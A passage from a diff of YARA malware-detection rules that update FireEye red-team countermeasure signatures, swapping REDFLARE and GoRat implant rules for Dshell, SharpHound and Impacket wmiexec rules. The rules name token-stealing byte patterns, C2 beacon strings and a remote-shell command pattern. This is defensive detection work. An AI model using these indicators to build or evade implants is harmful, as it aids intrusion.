= "RtlUnwind" + $s87 = "SetConsoleCtrlHandler" + $s88 = "SetEnvironmentVariableW" + $s89 = "SetFilePointer" + $s90 = "SetHandleCount" + $s91 = "SetLastError" + $s92 = "Sleep" + $s93 = "SuspendThread" + $s94 = "SwitchToThread" + $s95 = "SystemTimeToTzSpecificLocalTime" + $s96 = "TryEnterCriticalSection" + $s97 = "TzSpecificLocalTimeToSystemTime" + $s98 = "UnhandledExceptionFilter" + $s99 = "VirtualAlloc" + $s100 = "VirtualFree" + $s101 = "WaitForSingleObject" + $s102 = "WideCharToMultiByte" + $s103 = "WriteConsoleA" + $s104 = "WriteFile" + $s105 = "lstrlenW" condition: - ( uint16(0)==0x5A4D) and ( uint32( uint32(0x3C))==0x00004550) and all of them + ( uint16(0)==0x5A4D and uint32( uint32(0x3C))==0x00004550) and filesize >500KB and filesize >700KB and all of ($s*) and 1 of ($dlang*) and not $ign1 and not $ign2 } -rule FIREEYE_RT_APT_Trojan_Win_REDFLARE_3 : FILE +rule FIREEYE_RT_APT_Loader_Win32_Dshell_3 : FILE { meta: description = "No description has been set in the source file - FireEye-RT" author = "FireEye" - id = "2f6785c4-f4d0-52ff-8c46-da953e2ca92a" - date = "2020-12-01" - date = "2020-12-01" + id = "6b6fccef-ac93-5f1b-b9b6-c2d3ee4d8da7" + date = "2020-11-27" + date = "2020-11-27" modified = "2020-12-09" reference = "https://github.com/mandiant/red_team_tool_countermeasures/" - source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/REDFLARE/production/yara/APT_Trojan_Win_REDFLARE_3.yar#L4-L19" + source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/DSHELL/production/yara/APT_Loader_Win32_DShell_3.yar#L4-L19" license_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/LICENSE.txt" - hash = "9ccda4d7511009d5572ef2f8597fba4e,ece07daca53dd0a7c23dacabf50f56f1" - logic_hash = "ee104bc145686a134e4d6d620dae7d1dacff7645d47f1a8d7a212327352b8e87" + hash = "12c3566761495b8353f67298f15b882c" + logic_hash = "ec2a8b0abc6cb6d1861199b892fbe84782b42babb08e3ea203d10ab17ff7a20a" score = 75 quality = 75 tags = "FILE" rev = 1 strings: - $calc_image_size = { 28 00 00 00 [2-30] 83 E2 1F [4-20] C1 F8 05 [0-8] 0F AF C? [0-30] C1 E0 02 } - $str1 = "CreateCompatibleBitmap" fullword - $str2 = "BitBlt" fullword - $str3 = "runCommand" fullword + $sb1 = { 6A 40 68 00 30 00 00 [4-32] E8 [4-8] 50 [0-16] E8 [4-150] 6A FF [1-32] 6A 00 6A 00 5? 6A 00 6A 00 [0-32] E8 [4] 50 } + $ss1 = "\x00CreateThread\x00" + $ss2 = "base64.d" fullword + $ss3 = "core.sys.windows" fullword condition: - ( uint16(0)==0x5A4D) and ( uint32( uint32(0x3C))==0x00004550) and all of them + ( uint16(0)==0x5A4D) and ( uint32( uint32(0x3C))==0x00004550) and ( uint16( uint32(0x3C)+0x18)==0x010B) and all of them } -rule FIREEYE_RT_APT_Trojan_Win_REDFLARE_5 : FILE +rule FIREEYE_RT_APT_Loader_Win32_Dshell_1 : FILE { meta: description = "No description has been set in the source file - FireEye-RT" author = "FireEye" - id = "892981d6-f310-5ee8-95b5-dd4bd720a86c" - date = "2020-12-01" - date = "2020-12-01" + id = "dad763bd-0e4a-542a-9920-ece11d23ce24" + date = "2020-11-27" + date = "2020-11-27" modified = "2020-12-09" reference = "https://github.com/mandiant/red_team_tool_countermeasures/" - source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/REDFLARE/production/yara/APT_Trojan_Win_REDFLARE_5.yar#L4-L20" + source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/DSHELL/production/yara/APT_Loader_Win32_DShell_1.yar#L4-L20" license_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/LICENSE.txt" - hash = "dfbb1b988c239ade4c23856e42d4127b, 3322fba40c4de7e3de0fda1123b0bf5d" - logic_hash = "ab38e5ebded026829672941709797b40f8e13fb244b6a8ed3545de4358f727b8" + hash = "12c3566761495b8353f67298f15b882c" + logic_hash = "79643f9c252765647d80f6fe1ee7bb698fbc6a6c3a0ff1fd819a09bff031907c" score = 75 quality = 75 tags = "FILE" - rev = 3 + rev = 1 strings: - $s1 = "AdjustTokenPrivileges" fullword - $s2 = "LookupPrivilegeValueW" fullword - $s3 = "ImpersonateLoggedOnUser" fullword - $s4 = "runCommand" fullword - $steal_token = { FF 15 [4] 85 C0 [1-40] C7 44 24 ?? 01 00 00 00 [0-20] C7 44 24 ?? 02 00 00 00 [0-20] FF 15 [4] FF [1-5] 85 C0 [4-40] 00 04 00 00 FF 15 [4-5] 85 C0 [2-20] ( BA 0F 00 00 00 | 6A 0F ) [1-4] FF 15 [4] 85 C0 74 [1-20] FF 15 [4] 85 C0 74 [1-20] ( 6A 0B | B9 0B 00 00 00 ) E8 } + $sb1 = { 6A 40 68 00 30 00 00 [4-32] E8 [4-8] 50 [0-16] E8 [4-150] 6A FF [1-32] 6A 00 6A 00 5? 6A 00 6A 00 [0-32] E8 [4] 50 } + $sb2 = { FF 7? 0C B? [4-16] FF 7? 08 5? [0-12] E8 [4] 84 C0 74 05 B? 01 00 00 00 [0-16] 80 F2 01 0F 84 } + $ss1 = "\x00CreateThread\x00" + $ss2 = "base64.d" fullword + $ss3 = "core.sys.windows" fullword condition: - ( uint16(0)==0x5A4D) and ( uint32( uint32(0x3C))==0x00004550) and all of them + ( uint16(0)==0x5A4D) and ( uint32( uint32(0x3C))==0x00004550) and ( uint16( uint32(0x3C)+0x18)==0x010B) and all of them } -rule FIREEYE_RT_APT_Loader_Raw32_REDFLARE_1 : FILE +rule FIREEYE_RT_APT_Loader_Win32_Dshell_2 : FILE { meta: description = "No description has been set in the source file - FireEye-RT" author = "FireEye" - id = "8f8ec27f-afac-5da5-b76f-b984e14e0066" + id = "ae34d547-d979-5ce2-bcf8-a5b4e4567de3" date = "2020-11-27" date = "2020-11-27" modified = "2020-12-09" reference = "https://github.com/mandiant/red_team_tool_countermeasures/" - source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/REDFLARE/production/yara/APT_Loader_Raw32_REDFLARE_1.yar#L4-L16" + source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/DSHELL/production/yara/APT_Loader_Win32_DShell_2.yar#L4-L21" license_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/LICENSE.txt" - hash = "4022baddfda3858a57c9cbb0d49f6f86" - logic_hash = "05ed89bd82600b4d5ef01ece2e0a9bd84e968988fd2bda1bab4ec316a9a9906b" + hash = "590d98bb74879b52b97d8a158af912af" + logic_hash = "958ff45add46c0a43e839e8007c1d9296ee89ddd8c045b8ec6b031b225207a6c" score = 75 quality = 75 tags = "FILE" - rev = 1 + rev = 2 strings: - $load = { EB ?? 58 [0-4] 8B 10 8B 48 [1-3] 8B C8 83 C1 ?? 03 D1 83 E9 [1-3] 83 C1 [1-4] FF D? } + $sb1 = { 6A 40 68 00 30 00 00 [4-32] E8 [4-8] 50 [0-16] E8 [4-150] 6A FF [1-32] 6A 00 6A 00 5? 6A 00 6A 00 [0-32] E8 [4] 50 } + $ss1 = "\x00CreateThread\x00" + $ss2 = "base64.d" fullword + $ss3 = "core.sys.windows" fullword + $ss4 = "C:\\Users\\config.ini" fullword + $ss5 = "Invalid config file" fullword condition: - ( uint16(0)!=0x5A4D) and all of them + ( uint16(0)==0x5A4D) and ( uint32( uint32(0x3C))==0x00004550) and ( uint16( uint32(0x3C)+0x18)==0x010B) and all of them } -rule FIREEYE_RT_APT_Trojan_Win_REDFLARE_2 : FILE +rule FIREEYE_RT_Loader_MSIL_Allthethings_1 : FILE { meta: - description = "No description has been set in the source file - FireEye-RT" + description = "The TypeLibGUID present in a .NET binary maps directly to the ProjectGuid found in the '.csproj' file of a .NET project. This rule looks for .NET PE files that contain the ProjectGuid found in the 'AllTheThings' project." author = "FireEye" - id = "84881e5c-05df-5911-af42-ec82e559588c" - date = "2020-11-27" - date = "2020-11-27" + id = "1805b406-2531-56bf-8e08-e63a59ffcc84" + date = "2020-12-09" modified = "2020-12-09" reference = "https://github.com/mandiant/red_team_tool_countermeasures/" - source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/REDFLARE/production/yara/APT_Trojan_Win_REDFLARE_2.yar#L4-L20" + source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/ALLTHETHINGS/production/yara/Loader_MSIL_AllTheThings_1.yar#L4-L15" license_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/LICENSE.txt" - hash = "9529c4c9773392893a8a0ab8ce8f8ce1,05b99d438dac63a5a993cea37c036673" - logic_hash = "1f2e1f644b1932486444dfda30b7dad7f50121f59fa493eb8a1a0528ae46db26" + hash = "dd8805d0e470e59b829d98397507d8c2" + logic_hash = "e3058095f2a49f8c0f78cb392024795367609b04c1da80210ab8d72c6613ee71" score = 75 - quality = 75 + quality = 73 tags = "FILE" rev = 2 strings: - $1 = "initialize" fullword - $2 = "getData" fullword - $3 = "putData" fullword - $4 = "fini" fullword - $5 = "Cookie: SID1=%s" fullword + $typelibguid0 = "542ccc64-c4c3-4c03-abcd-199a11b26754" ascii nocase wide condition: - ( uint16(0)==0x5A4D) and ( uint32( uint32(0x3C))==0x00004550) and all of them + ( uint16(0)==0x5A4D and uint32( uint32(0x3C))==0x00004550) and any of them } -rule FIREEYE_RT_APT_Builder_PY_REDFLARE_1 +rule FIREEYE_RT_Loader_MSIL_Netassemblyinject_1 : FILE { meta: - description = "No description has been set in the source file - FireEye-RT" + description = "The TypeLibGUID present in a .NET binary maps directly to the ProjectGuid found in the '.csproj' file of a .NET project. This rule looks for .NET PE files that contain the ProjectGuid found in the 'NET-Assembly-Inject' project." author = "FireEye" - id = "3b5ad25d-ce66-572e-9a91-40a73b8fd447" - date = "2020-11-27" - date = "2020-11-27" + id = "62a7dc4c-678b-5f13-9661-4679eafe1c72" + date = "2020-12-09" modified = "2020-12-09" reference = "https://github.com/mandiant/red_team_tool_countermeasures/" - source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/REDFLARE/production/yara/APT_Builder_PY_REDFLARE_1.yar#L4-L22" + source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/NETASSEMBLYINJECT/production/yara/Loader_MSIL_NETAssemblyInject_1.yar#L4-L17" license_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/LICENSE.txt" - hash = "d0a830403e56ebaa4bfbe87dbfdee44f" - logic_hash = "1948cadb7242eb69bffbc222802ce9c1af38d7a846da09b6343b1449fe054e42" + hash = "dd8805d0e470e59b829d98397507d8c2" + logic_hash = "9a43df9ee26a44f4db5c2d22fbc1a6c86c5af0c9d44a79c6627a4cc8cf31bb8d" score = 75 - quality = 75 - tags = "" - rev = 1 + quality = 69 + tags = "FILE" + rev = 2 strings: - $1 = "LOAD_OFFSET_32 = 0x612" - $2 = "LOAD_OFFSET_64 = 0x611" - $3 = "class RC4:" - $4 = "struct.pack('<Q' if is64b else '<L'" - $5 = "stagerConfig['comms']['config']" - $6 = "_x86.dll" - $7 = "_x64.dll" + $typelibguid0 = "af09c8c3-b271-4c6c-8f48-d5f0e1d1cac6" ascii nocase wide + $typelibguid1 = "c5e56650-dfb0-4cd9-8d06-51defdad5da1" ascii nocase wide + $typelibguid2 = "e8fa7329-8074-4675-9588-d73f88a8b5b6" ascii nocase wide condition: - all of them and @1[1]<@2[1] and @2[1]<@3[1] and @3[1]<@4[1] and @4[1]<@5[1] + ( uint16(0)==0x5A4D and uint32( uint32(0x3C))==0x00004550) and any of them } -rule FIREEYE_RT_APT_Trojan_Win_REDFLARE_6 : FILE +rule FIREEYE_RT_Hacktool_MSIL_Sharphound_3 : FILE { meta: - description = "No description has been set in the source file - FireEye-RT" + description = "The TypeLibGUID present in a .NET binary maps directly to the ProjectGuid found in the '.csproj' file of a .NET project. This rule looks for .NET PE files that contain the ProjectGuid found in the public SharpHound3 project." author = "FireEye" - id = "5875a9ec-c3ee-57f0-a430-4443db585def" - date = "2020-12-01" - date = "2020-12-01" + id = "456b3208-1e8d-5eb7-81ee-39f1c886c5a7" + date = "2020-12-09" modified = "2020-12-09" reference = "https://github.com/mandiant/red_team_tool_countermeasures/" - source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/REDFLARE/supplemental/yara/APT_Trojan_Win_REDFLARE_6.yar#L4-L20" + source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/PUPPYHOUND/production/yara/HackTool_MSIL_SharpHound_3.yar#L4-L15" license_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/LICENSE.txt" - hash = "294b1e229c3b1efce29b162e7b3be0ab, 6902862bd81da402e7ac70856afbe6a2" - logic_hash = "1e6f8320e0c0b601fc72fa4d9c61e46adfbcd84638c97da5988ca848e036312a" + hash = "eeedc09570324767a3de8205f66a5295" + logic_hash = "baeea6cae42c755ee389378229b2b206c82f60f75a5ce5f9cfa06871fc9507d1" score = 75 - quality = 75 + quality = 73 tags = "FILE" - rev = 2 + rev = 4 strings: - $s1 = "RevertToSelf" fullword - $s2 = "Unsuccessful" fullword - $s3 = "Successful" fullword - $s4 = "runCommand" fullword - $s5 = "initialize" fullword + $typelibguid1 = "A517A8DE-5834-411D-ABDA-2D0E1766539C" ascii nocase wide condition: - ( uint16(0)==0x5A4D) and ( uint32( uint32(0x3C))==0x00004550) and all of them + ( uint16(0)==0x5A4D and uint32( uint32(0x3C))==0x00004550) and $typelibguid1 } -rule FIREEYE_RT_APT_Trojan_Linux_REDFLARE_1 : FILE +rule FIREEYE_RT_Hacktool_MSIL_Puppyhound_1 : FILE { meta: - description = "No description has been set in the source file - FireEye-RT" + description = "This is a modification of an existing FireEye detection for SharpHound. However, it looks for the string 'PuppyHound' instead of 'SharpHound' as this is all that was needed to detect the PuppyHound variant of SharpHound." author = "FireEye" - id = "220302bc-4ed3-5e10-9bd2-a8ed2bdaef73" - date = "2020-12-02" - date = "2020-12-02" + id = "1155f959-c8bc-597a-8a80-abee8d95b6ec" + date = "2020-12-09" modified = "2020-12-09" reference = "https://github.com/mandiant/red_team_tool_countermeasures/" - source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/REDFLARE/supplemental/yara/APT_Trojan_Linux_REDFLARE_1.yar#L4-L20" + source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/PUPPYHOUND/production/yara/HackTool_MSIL_PuppyHound_1.yar#L4-L19" license_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/LICENSE.txt" - hash = "79259451ff47b864d71fb3f94b1774f3, 82773afa0860d668d7fe40e3f22b0f3e" - logic_hash = "282f11c4c86d88d05f11e92f5483701d9a54c2dd39f21316cd271aa78a338d0f" + hash = "eeedc09570324767a3de8205f66a5295" + logic_hash = "39073bbfef15ecd28c1772e5d01e54c3d5774ecb4c90f0076bda5dc400abacba" score = 75 quality = 75 tags = "FILE" - rev = 1 + rev = 6 strings: - $s1 = "find_applet_by_name" fullword - $s2 = "bb_basename" fullword - $s3 = "hk_printf_chk" fullword - $s4 = "runCommand" fullword - $s5 = "initialize" fullword + $1 = "PuppyHound" + $2 = "UserDomainKey" + $3 = "LdapBuilder" + $init = { 28 [2] 00 0A 0A 72 [2] 00 70 1? ?? 28 [2] 00 0A 72 [2] 00 70 1? ?? 28 [2] 00 0A 28 [2] 00 0A 0B 1F 2D } + $msil = /\x00_Cor(Exe|Dll)Main\x00/ condition: - ( uint32(0)==0x464c457f) and all of them + ( uint16(0)==0x5A4D and uint32( uint32(0x3C))==0x00004550) and all of them } -rule FIREEYE_RT_Loader_MSIL_Inmemorycompilation_1 : FILE +rule FIREEYE_RT_Loader_MSIL_Netshshellcoderunner_1 : FILE { meta: - description = "The TypeLibGUID present in a .NET binary maps directly to the ProjectGuid found in the '.csproj' file of a .NET project. This rule looks for .NET PE files that contain the ProjectGuid found in the 'In-MemoryCompilation' project." + description = "The TypeLibGUID present in a .NET binary maps directly to the ProjectGuid found in the '.csproj' file of a .NET project. This rule looks for .NET PE files that contain the ProjectGuid found in the 'NetshShellCodeRunner' project." author = "FireEye" - id = "80234352-a449-5292-9f0c-beb7a1d39a6c" + id = "b3521812-7ea3-5f80-89bd-3bdd71b687f2" date = "2020-12-09" modified = "2020-12-09" reference = "https://github.com/mandiant/red_team_tool_countermeasures/" - source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/MEMCOMP/production/yara/Loader_MSIL_InMemoryCompilation_1.yar#L4-L15" + source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/NETSHSHELLCODERUNNER/production/yara/Loader_MSIL_NetshShellCodeRunner_1.yar#L4-L15" license_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/LICENSE.txt" hash = "dd8805d0e470e59b829d98397507d8c2" - logic_hash = "a964a186eb02a2792db01727a31ddaa2414fe9df83cda9b1c9db15d94603303a" + logic_hash = "97f6475a9d42697f633e06a9b04a85021ca4920145eb4af257d71b431448f0e9" score = 75 quality = 73 tags = "FILE" rev = 2 strings: - $typelibguid0 = "524d2687-0042-4f93-b695-5579f3865205" ascii nocase wide + $typelibguid0 = "49c045bc-59bb-4a00-85c3-4beb59b2ee12" ascii nocase wide condition: ( uint16(0)==0x5A4D and uint32( uint32(0x3C))==0x00004550) and any of them } -rule FIREEYE_RT_APT_Backdoor_Win_GORAT_2 : FILE +rule FIREEYE_RT_Hacktool_MSIL_PXELOOT_1 : FILE { meta: - description = "Verifies that the sample is a Windows PE that is less than 10MB in size and has the Go build ID strings. Then checks for various strings known to be in the Gorat implant including strings used in C2 json, names of methods, and the unique string 'murica' used in C2 comms. A check is done to ensure the string 'rat' appears in the binary over 1000 times as it is the name of the project used by the implant and is present well over 2000 times." + description = "The TypeLibGUID present in a .NET binary maps directly to the ProjectGuid found in the '.csproj' file of a .NET project. This rule looks for .NET PE files that contain the ProjectGuid found in the PXE And Loot project." author = "FireEye" - id = "e2c47711-d088-5cb4-8d21-f8199a865a28" + id = "5a72a6ff-bae4-57f5-a19b-a4595ac57293" date = "2020-12-09" modified = "2020-12-09" reference = "https://github.com/mandiant/red_team_tool_countermeasures/" - source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/REDFLARE (Gorat)/production/yara/APT_Backdoor_Win_GORAT_2.yar#L4-L34" + source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/PXELOOT/production/yara/HackTool_MSIL_PXELOOT_1.yar#L4-L15" license_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/LICENSE.txt" - hash = "f59095f0ab15f26a1ead7eed8cdb4902" - logic_hash = "8efc904498386d89879766a5021148a250f639bc328df12a34cfc8d620df6f6c" + hash = "82e33011ac34adfcced6cddc8ea56a81" + logic_hash = "c9892adcb9ff5471235e45988f6662d3b8f984fdafca7024a5781eed50f6c0b3" score = 75 - quality = 50 + quality = 73 tags = "FILE" rev = 7 strings: - $go1 = "go.buildid" ascii wide - $go2 = "Go build ID:" ascii wide - $json1 = "json:\"pid\"" ascii wide - $json2 = "json:\"key\"" ascii wide - $json3 = "json:\"agent_time\"" ascii wide - $json4 = "json:\"rid\"" ascii wide - $json5 = "json:\"ports\"" ascii wide - $json6 = "json:\"agent_platform\"" ascii wide - $rat = "rat" ascii wide - $str1 = "handleCommand" ascii wide - $str2 = "sendBeacon" ascii wide - $str3 = "rat.AgentVersion" ascii wide - $str4 = "rat.Core" ascii wide - $str5 = "rat/log" ascii wide - $str6 = "rat/comms" ascii wide - $str7 = "rat/modules" ascii wide - $str8 = "murica" ascii wide - $str9 = "master secret" ascii wide - $str10 = "TaskID" ascii wide - $str11 = "rat.New" ascii wide + $typelibguid1 = "78B2197B-2E56-425A-9585-56EDC2C797D6" ascii nocase wide condition: - uint16(0)==0x5A4D and uint32( uint32(0x3C))==0x00004550 and filesize <10MB and all of ($go*) and all of ($json*) and all of ($str*) and #rat>1000 + ( uint16(0)==0x5A4D and uint32( uint32(0x3C))==0x00004550) and $typelibguid1 } -rule FIREEYE_RT_APT_Backdoor_Win_Gorat_Memory +rule FIREEYE_RT_Hacktool_MSIL_GETDOMAINPASSWORDPOLICY_1 : FILE { meta: - description = "Identifies GoRat malware in memory based on strings." + description = "The TypeLibGUID present in a .NET binary maps directly to the ProjectGuid found in the '.csproj' file of a .NET project. This rule looks for .NET PE files that contain the ProjectGuid found in the recon utility 'getdomainpasswordpolicy' project." author = "FireEye" - id = "16fb1db7-711c-5d8d-9203-738c94f253fe" + id = "69745e99-33cc-5171-ae7a-5c98439a0b6d" date = "2020-12-09" modified = "2020-12-09" reference = "https://github.com/mandiant/red_team_tool_countermeasures/" - source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/REDFLARE (Gorat)/production/yara/APT_Backdoor_Win_GoRat_Memory.yar#L4-L27" + source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/GETDOMAINPASSWORDPOLICY/production/yara/HackTool_MSIL_GETDOMAINPASSWORDPOLICY_1.yar#L4-L15" license_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/LICENSE.txt" - hash = "3b926b5762e13ceec7ac3a61e85c93bb" - logic_hash = "88272e59325d106f96d6b6f1d57daf968823c1e760067dee0334c66c521ce8c2" + hash = "dd8805d0e470e59b829d98397507d8c2" + logic_hash = "6b2ea3ebfea2c87f16052f4a43b64eb2d595c2dd4a64d45dfce1642668dcf602" score = 75 - quality = 75 - tags = "" - rev = 1 + quality = 73 + tags = "FILE" + rev = 4 strings: - $murica = "murica" fullword - $rat1 = "rat/modules/socks.(*HTTPProxyClient).beacon" fullword - $rat2 = "rat.(*Core).generateBeacon" fullword - $rat3 = "rat.gJitter" fullword - $rat4 = "rat/comms.(*protectedChannel).SendCmdResponse" fullword - $rat5 = "rat/modules/filemgmt.(*acquire).NewCommandExecution" fullword - $rat6 = "rat/modules/latlisten.(*latlistensrv).handleCmd" fullword - $rat7 = "rat/modules/netsweeper.(*netsweeperRunner).runSweep" fullword - $rat8 = "rat/modules/netsweeper.(*Pinger).listen" fullword - $rat9 = "rat/modules/socks.(*HTTPProxyClient).beacon" fullword - $rat10 = "rat/platforms/win/dyloader.(*memoryLoader).ExecutePluginFunction" fullword - $rat11 = "rat/platforms/win/modules/namedpipe.(*dummy).Open" fullword - $winblows = "rat/platforms/win.(*winblows).GetStage" fullword + $typelibguid0 = "a5da1897-29aa-45f4-a924-561804276f08" ascii nocase wide condition: - $winblows or #murica>10 or 3 of ($rat*) + filesize <10MB and ( uint16(0)==0x5A4D and uint32( uint32(0x3C))==0x00004550) and any of them } -rule FIREEYE_RT_APT_Backdoor_Win_GORAT_5 : FILE +rule FIREEYE_RT_Hacktool_PY_Impacketobfuscation_2 { meta: - description = "No description has been set in the source file - FireEye-RT" + description = "wmiexec" author = "FireEye" - id = "73102bd2-7b94-5c7b-b9a4-cfc9cf5e3212" - date = "2020-12-02" - date = "2020-12-02" + id = "f1059f66-eaff-5866-bafb-c94236cf96a0" + date = "2020-12-01" + date = "2020-12-01" modified = "2020-12-09" reference = "https://github.com/mandiant/red_team_tool_countermeasures/" - source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/REDFLARE (Gorat)/production/yara/APT_Backdoor_Win_GORAT_5.yar#L4-L23" + source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/IMPACKETOBF (Wmiexec)/production/yara/HackTool_PY_ImpacketObfuscation_2.yar#L4-L21" license_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/LICENSE.txt" - hash = "cdf58a48757010d9891c62940c439adb, a107850eb20a4bb3cc59dbd6861eaf0f" - logic_hash = "67f85fb3bedfd18a1226c92318f387be3c7ff9566ca2d554c49cf62389482552" + hash = "f3dd8aa567a01098a8a610529d892485" + logic_hash = "ccbbe507798f16c7acf0780770fdb81b2e7dc333ab8bc51e6216816276c3f14b" score = 75 quality = 75 - tags = "FILE" - rev = 1 + tags = "" + rev = 2 strings: - $1 = "comms.BeaconData" fullword - $2 = "comms.CommandResponse" fullword - $3 = "rat.BaseChannel" fullword - $4 = "rat.Config" fullword - $5 = "rat.Core" fullword - $6 = "platforms.AgentPlatform" fullword - $7 = "GetHostID" fullword - $8 = "/rat/cmd/gorat_shared/dllmain.go" fullword + $s1 = "import random" + $s2 = "class WMIEXEC" nocase + $s3 = "class RemoteShell" nocase + $s4 = /=[\x09\x20]{0,32}str\(int\(time\.time\(\)\)[\x09\x20]{0,32}-[\x09\x20]{0,32}random\.randint\(\d{1,10}[\x09\x20]{0,32},[\x09\x20]{0,32}\d{1,10}\)\)[\x09\x20]{0,32}\+[\x09\x20]{0,32}str\(uuid\.uuid4\(\)\)\.split\([\x22\x27]\-[\x22\x27]\)\[0\]/ + $s5 = /self\.__shell[\x09\x20]{0,32}=[\x09\x20]{0,32}[\x22\x27]cmd.exe[\x09\x20]{1,32}\/q[\x09\x20]{1,32}\/K [\x22\x27]/ nocase condition: - ( uint16(0)==0x5A4D) and ( uint32( uint32(0x3C))==0x00004550) and all of them + all of them } -rule FIREEYE_RT_Trojan_MSIL_GORAT_Module_Powershell_1 : FILE +rule FIREEYE_RT_Loader_MSIL_Csharpsectioninjection_1 : FILE { meta: - description = "The TypeLibGUID present in a .NET binary maps directly to the ProjectGuid found in the '.csproj' file of a .NET project. This rule looks for .NET PE files that contain the ProjectGuid found in the 'RedFlare - Module - PowerShell' project." + description = "The TypeLibGUID present in a .NET binary maps directly to the ProjectGuid found in the '.csproj' file of a .NET project. This rule looks for .NET PE files that contain the ProjectGuid found in the 'C_Sharp_SectionInjection' project." author = "FireEye" - id = "b0fba130-9cd9-5b7f-a806-9ff8099f5731" + id = "ca5bf5cd-1950-53ed-8984-e880a15e658e" date = "2020-12-09" modified = "2020-12-09" reference = "https://github.com/mandiant/red_team_tool_countermeasures/" - source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/REDFLARE (Gorat)/production/yara/Trojan_MSIL_GORAT_Module_PowerShell_1.yar#L4-L16" + source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/SHARPSECTIONINJECTION/production/yara/Loader_MSIL_CSharpSectionInjection_1.yar#L4-L15" license_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/LICENSE.txt" hash = "dd8805d0e470e59b829d98397507d8c2" - logic_hash = "e596bc0316a4ef85f04c2683ebc7c94bf9b831843232c33e62c84991e4caeb97" + logic_hash = "011cf4dffe6ef90a79cdfabb0e297152c00b0404b1801f56fd7e703ab90b1692" score = 75 - quality = 71 + quality = 73 tags = "FILE" - rev = 1 + rev = 2 strings: - $typelibguid0 = "38d89034-2dd9-4367-8a6e-5409827a243a" ascii nocase wide - $typelibguid1 = "845ee9dc-97c9-4c48-834e-dc31ee007c25" ascii nocase wide + $typelibguid0 = "d77135da-0496-4b5c-9afe-e1590a4c136a" ascii nocase wide condition: ( uint16(0)==0x5A4D and uint32( uint32(0x3C))==0x00004550) and any of them } -rule FIREEYE_RT_APT_Backdoor_Macos_GORAT_1 : FILE +rule FIREEYE_RT_Hacktool_MSIL_Wmisharp_1 : FILE { meta: - description = "This rule is looking for specific strings associated with network activity found within the MacOS generated variant of GORAT" + description = "The TypeLibGUID present in a .NET binary maps directly to the ProjectGuid found in the '.csproj' file of a .NET project. This rule looks for .NET PE files that contain the ProjectGuid found in the 'WMISharp' project." author = "FireEye" - id = "4646eadb-7acf-582f-9ad6-00f012ceed8a" + id = 